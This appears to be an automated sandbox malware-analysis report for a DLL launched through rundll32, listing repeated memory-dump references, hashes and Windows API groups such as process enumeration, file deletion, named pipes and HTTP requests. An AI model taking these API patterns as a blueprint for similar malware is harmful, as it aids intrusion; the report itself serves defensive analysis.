                          • Instruction ID: 3dee2590d022ed0d9cdef21077ca33f3aa699e5f3464691021cf35a591a031a2
                          • Opcode Fuzzy Hash: 142c038aa201e52e575b6126af4ec832a872663e7ba2b392c7bc3b98985ecee4
                          • Instruction Fuzzy Hash: 7A21E5B252CA8187E770DB25E19472AB7A1F788798F001135F6CD42A98DF7CE544CF44
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: wsprintf
                          • String ID:
                          • API String ID: 2111968516-0
                          • Opcode ID: 09100f0300395ae6f5b584f03befab42788e05347f36807b9dbcae9cb551cf0d
                          • Instruction ID: 08079928ec6debd972b9b545c8476a1fa3fb1e6e5e4abcbbfd344bdc986a3100
                          • Opcode Fuzzy Hash: 09100f0300395ae6f5b584f03befab42788e05347f36807b9dbcae9cb551cf0d
                          • Instruction Fuzzy Hash: 7A112E72A2CA8196D761DB20E54036AB3A2FBCC754F904135E68D42BA8DF3CE645CF00
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 252c82bd18f63079363c04d0726cb3e85d9e951d6d0439d97e6f477b3e596fc1
                          • Instruction ID: 9572d67f715c60cd58d5a4348aebf8d729ad9ae885d790270af0a02e87fb450e
                          • Opcode Fuzzy Hash: 252c82bd18f63079363c04d0726cb3e85d9e951d6d0439d97e6f477b3e596fc1
                          • Instruction Fuzzy Hash: 6CE092B1E3CA82C7E3A0AB34E94833A6A51EB89360F500630E9DA811C4EF2DF445DB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectorySystem
                          • String ID:
                          • API String ID: 2188284642-0
                          • Opcode ID: dfb4a1fa39bbd87ebdbe77a0f586fcf263206d1ff544b9d7c1b54ce86c222524
                          • Instruction ID: 21df033dac9d56172a5f484c4d3e0efbc21ce4587244495013d9a82f3d00cb6b
                          • Opcode Fuzzy Hash: dfb4a1fa39bbd87ebdbe77a0f586fcf263206d1ff544b9d7c1b54ce86c222524
                          • Instruction Fuzzy Hash: 9AE01292B5898282E760A730D4513BB6262FBD8314FD04231A59ED65E5DF2CFB06C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateByteCharMemoryMultiVirtualWide
                          • String ID:
                          • API String ID: 2538853753-0
                          • Opcode ID: a906b0fc521b46abc145193926863fdc03b59511d6abb81f8d8ae146be955827
                          • Instruction ID: 6ae47f06cfd4b91c3761f8cf702aa22680877d3bb84b26a952d5c3be5e2e6e37
                          • Opcode Fuzzy Hash: a906b0fc521b46abc145193926863fdc03b59511d6abb81f8d8ae146be955827
                          • Instruction Fuzzy Hash: 9A01C576A28A858AD790DB25E48175EBBE1F7C87A4F105035FA8B83B58DF3CE5458B00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
                          • String ID: h
                          • API String ID: 30365702-2439710439
                          • Opcode ID: f6810e4c68f11a3764d1144e4f6a2e2f8f72179d48d86f12ad25ea2283f23b77
                          • Instruction ID: 003a3532b161ace862cdeec5de581584f24497bfb80c1146f893d491d6856393
                          • Opcode Fuzzy Hash: f6810e4c68f11a3764d1144e4f6a2e2f8f72179d48d86f12ad25ea2283f23b77
                          • Instruction Fuzzy Hash: E6C1F376A0CBC18AE760CB25E4547ABB7A2F7C8754F404125E68D83A69CF7CE449CF40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
                          • String ID: o
                          • API String ID: 2074107575-252678980
                          • Opcode ID: 5af0839b78c35f7c4fda2989d8c727d21a78acf1e9bf26bd2094f79093803cc2
                          • Instruction ID: 008123d218d584d5338f884acc08cceca81b9e06ae33cfdef2eaec06df179a03
                          • Opcode Fuzzy Hash: 5af0839b78c35f7c4fda2989d8c727d21a78acf1e9bf26bd2094f79093803cc2
                          • Instruction Fuzzy Hash: 0EB1ECB6A1DF8186DA60CB25F45036AB7A1FB8C794F500535EA8E83B69DF3CE545CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileInitOpenStringUnicode
                          • String ID: $0$@
                          • API String ID: 3719522541-2347541974
                          • Opcode ID: 569bf1d9c0e4b42045824f196861e1bccdac350dc9b2e721c941129060653f3b
                          • Instruction ID: 1542d5adb8e2bf5395d91c9d85498a303d5b21d40347979c32836c14d65dcfbf
                          • Opcode Fuzzy Hash: 569bf1d9c0e4b42045824f196861e1bccdac350dc9b2e721c941129060653f3b
                          • Instruction Fuzzy Hash: E401EDB6518A8186E750DF20E45439BBB61F7C47A4F501035E2CE43AA8DF7DE98ACF40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DeleteFileInitStringUnicode
                          • String ID: 0$@
                          • API String ID: 3559453722-1545510068
                          • Opcode ID: b6164af5c4588a1862d81e9109c65e2a6067d28343454251f55d6c9ee728859c
                          • Instruction ID: 57a6e07e03fff23ffd3ed69a36306335f77c7c098019ace4a68b745ca29c00aa
                          • Opcode Fuzzy Hash: b6164af5c4588a1862d81e9109c65e2a6067d28343454251f55d6c9ee728859c
                          • Instruction Fuzzy Hash: 04F01DB261898286D7209F10E45435FBB65FB84398F500125E2CE46AA8DB7DE659CF40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
                          • String ID:
                          • API String ID: 65906682-0
                          • Opcode ID: f0eb44e509ff0d4d73d58d8dbe5cd4570fa6573ad47b34b09cc61e315acd5dcb
                          • Instruction ID: 5a745b009f0cd31512de3fa27f2c045e34e7d0627f03362659e460c76a5a6c26
                          • Opcode Fuzzy Hash: f0eb44e509ff0d4d73d58d8dbe5cd4570fa6573ad47b34b09cc61e315acd5dcb
                          • Instruction Fuzzy Hash: 0F5126B251DF8691DA50DB21F4403AAB3A6FF883A4F804535E68E43699EF7CF545CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Version
                          • String ID:
                          • API String ID: 1889659487-0
                          • Opcode ID: 1c33a9e7f7864ab9b6d588ba9abe1a45e84af9b554b73114541b1a6212808f0c
                          • Instruction ID: cdf11eb31306092d5032e4b81fb523418923fd2fbde684bc30c3cb1aa617b8c1
                          • Opcode Fuzzy Hash: 1c33a9e7f7864ab9b6d588ba9abe1a45e84af9b554b73114541b1a6212808f0c
                          • Instruction Fuzzy Hash: BB317EF1C2D941C6EAB08B50F54C33AF6A2FB98329F502139E29E45994DB7CF594CE05
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileInternetRead
                          • String ID:
                          • API String ID: 778332206-0
                          • Opcode ID: a68542daa31667be7df08955cda83d3b91bfe5c76f250ac66b7e363db0ead897
                          • Instruction ID: 868bcfd6431aa0e6a10dbf8ffa41b15761f698d7fe955961a6c021458836b6c7
                          • Opcode Fuzzy Hash: a68542daa31667be7df08955cda83d3b91bfe5c76f250ac66b7e363db0ead897
                          • Instruction Fuzzy Hash: 54214D72628A8187DB61CB25E4507AAA3E2F7CC784F404134EA8D83B98EF3DD645CF00
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileInformationQuery
                          • String ID:
                          • API String ID: 365787318-0
                          • Opcode ID: 098af84858ac3b4f52afb1f03821544a4055eeb608dc3f3c06a72dec3df0af55
                          • Instruction ID: 5bb32cb1f54c31fb3d617247aae5db1493eabace367975838b417855bdad8174
                          • Opcode Fuzzy Hash: 098af84858ac3b4f52afb1f03821544a4055eeb608dc3f3c06a72dec3df0af55
                          • Instruction Fuzzy Hash: 76F0A7B172CE8582E7409B21E40079EA751FBC47A0F404035E58D9BB58DFBDE5458B40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DelayExecution
                          • String ID:
                          • API String ID: 1249177460-0
                          • Opcode ID: 59eb6cab38d5ab3a285350ec58574edb8211473a9c8413bbadbb0b9e4aa9da1f
                          • Instruction ID: 4e299292fe1eb3adde2c7a294031fa4c1f5fefa9d2fe113b6e41cf6d9ada8b51
                          • Opcode Fuzzy Hash: 59eb6cab38d5ab3a285350ec58574edb8211473a9c8413bbadbb0b9e4aa9da1f
                          • Instruction Fuzzy Hash: DCD0C776A1868187CB145B24E45501A7760FB95304FD04529E68D55754DE3CD625CF04
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
                          • String ID:
                          • API String ID: 3605396869-0
                          • Opcode ID: df5dea298db85244bf739151dd0f199090a4904090481203f9a3e6dbb1e14d00
                          • Instruction ID: 52369fcefba164068206134278dfc38db0407164cd20ff08e77a7ab4b118a07e
                          • Opcode Fuzzy Hash: df5dea298db85244bf739151dd0f199090a4904090481203f9a3e6dbb1e14d00
                          • Instruction Fuzzy Hash: 18D101B260CF8695DA70DB25E4503AAB7A6FB88394F804135D6CD43BA9EF3CE545CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: wsprintf$AllocateFolderMemoryPathVirtual
                          • String ID:
                          • API String ID: 206084008-0
                          • Opcode ID: 613f21d74cee651ec8cd53ec4a79d78952a861f9d187309613a0fa89924084a3
                          • Instruction ID: eb08a43d9f32bd6ba0dbcd7e5a29d8a475c1f581239728949247254f304b4680
                          • Opcode Fuzzy Hash: 613f21d74cee651ec8cd53ec4a79d78952a861f9d187309613a0fa89924084a3
                          • Instruction Fuzzy Hash: 51D1DAA261DFC291EA60DB24E4507AFB362FBC8354F501036E68D87AA9DF7CE545CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: wsprintf$CloseCodeExitHandleInternetThreadnew[]$AllocateMemoryVirtual
                          • String ID:
                          • API String ID: 511820185-0
                          • Opcode ID: b11fec9b2df619dd1629fbab8ca8a0df756b4cb1f15924333ec51bd5337baf54
                          • Instruction ID: 3c8c7279e6aad33fff4c8744ad7e9ff9def80d3771b1d9ee395a17bb59a01a85
                          • Opcode Fuzzy Hash: b11fec9b2df619dd1629fbab8ca8a0df756b4cb1f15924333ec51bd5337baf54
                          • Instruction Fuzzy Hash: 7F520AB591DEC286E770CB24E4443AAB7A2FB88364F104535D68D96BA9DF7CF485CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                          • String ID: @
                          • API String ID: 1610889594-2766056989
                          • Opcode ID: 4573a02829f282772507428644cc67174c61ceec7a673b26d8b8ac1498a62bea
                          • Instruction ID: c6cffbbe94a0d4f330e1026f67ee874c9b9e17ad29d457293754bf2fe4629d70
                          • Opcode Fuzzy Hash: 4573a02829f282772507428644cc67174c61ceec7a673b26d8b8ac1498a62bea
                          • Instruction Fuzzy Hash: 26513476A19F8681EB50DB25E45036EB762FBC87A4F500131EA8E43BA9DF3CE445C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 4137211488-0
                          • Opcode ID: 589aefb776d13d9939ed19f12e913b119a33694cf421f9d1ae57f596f02ad99c
                          • Instruction ID: 163399ac267d2b884ba732c8be4aef4fab10b020b04d19feec6c64096ddb1c79
                          • Opcode Fuzzy Hash: 589aefb776d13d9939ed19f12e913b119a33694cf421f9d1ae57f596f02ad99c
                          • Instruction Fuzzy Hash: 3791F476A1DFC2D6DA60DB25E4402AAB3A6FB88394F500135DA8D43BA9DF3CE545CF40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HttpRequest$OpenSend$InternetOption
                          • String ID:
                          • API String ID: 664753792-0
                          • Opcode ID: 7ca2387c2bbf1a7d28999812ac2f6f2864370cd4003b28c3ab5a0417524daa68
                          • Instruction ID: f18b43761ff488d8caef14c0b0993910f523f9c1e93f7f82d61e3d26fc0940f4
                          • Opcode Fuzzy Hash: 7ca2387c2bbf1a7d28999812ac2f6f2864370cd4003b28c3ab5a0417524daa68
                          • Instruction Fuzzy Hash: C961B6B690DF8186E760CB24F4543AAB7A2F789794F500435E68D43B68DF7DE588CB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295022801.00007FFB1E86E000.00000002.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295035984.00007FFB1E86F000.00000008.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295051153.00007FFB1E870000.00000004.00000001.01000000.00000000.sdmpDownload File
                          • Associated: 00000003.00000002.1295065886.00007FFB1E872000.00000002.00000001.01000000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ffb1e860000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleOpen
                          • String ID:
                          • API String ID: 435140893-0
                          • Opcode ID: 403d023b98cd0d8e1c326f4d095468dd49f40ac6afd71fa5eece1c87c1cd0193
                          • Instruction ID: 1f88cfa5363c87a3835af63c29a4277f2b8f03a8f89f96380992241a40e59e68
                          • Opcode Fuzzy Hash: 403d023b98cd0d8e1c326f4d095468dd49f40ac6afd71fa5eece1c87c1cd0193
                          • Instruction Fuzzy Hash: 3D41D8B6A29E8186E760CB25F45472EB3A2F7C9794F105025F78E83B58CF7DE8448B04
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1295006377.00007FFB1E861000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FFB1E860000, based on PE: true
                          • Associated: 00000003.00000002.1294990389.00007FFB1E860000.00000002.00000001.01000000.00000000.sdmpDownload File
